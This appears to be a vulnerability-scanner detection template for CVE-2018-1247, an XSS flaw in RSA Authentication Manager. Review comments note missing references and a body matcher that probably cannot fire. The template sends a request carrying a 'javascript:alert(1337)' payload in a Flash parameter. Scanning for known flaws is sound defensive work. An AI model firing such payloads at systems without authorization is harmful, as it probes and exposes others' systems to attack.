---
# Detection template for CVE-2018-1247. It requests the pmfso.swf Flash object
# under /IMS-AA-IDP/ with a marker value in gotoUrlLocal and reports a finding
# only when both matchers below succeed.
# NOTE(review): info carries no description or reference. Add the vendor
# advisory link and affected versions so the CVE-to-check mapping can be
# verified and triaged by whoever receives the finding.
id: CVE-2018-1247

info:
  name: RSA Authentication Manager XSS
  author: madrobot
  severity: medium
  tags: cve,cve2018,xss,flash

requests:
  - method: GET
    path:
      - "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//"

    # "and": a finding needs the header matcher AND the body matcher.
    matchers-condition: and
    matchers:
      # The response headers must declare a Flash object.
      # NOTE(review): there is no status matcher, so any response carrying
      # this content type passes this half of the check.
      - type: word
        part: header
        words:
          - "application/x-shockwave-flash"

      # The marker string must appear in the response body.
      # NOTE(review): a compiled SWF is binary and is not expected to echo
      # query parameters. Confirm against a known-vulnerable test instance
      # that this matcher can fire; if it cannot, the "and" condition makes
      # the template silently report nothing (false negatives).
      - type: word
        part: body
        words:
          - "javascript:alert(1337)"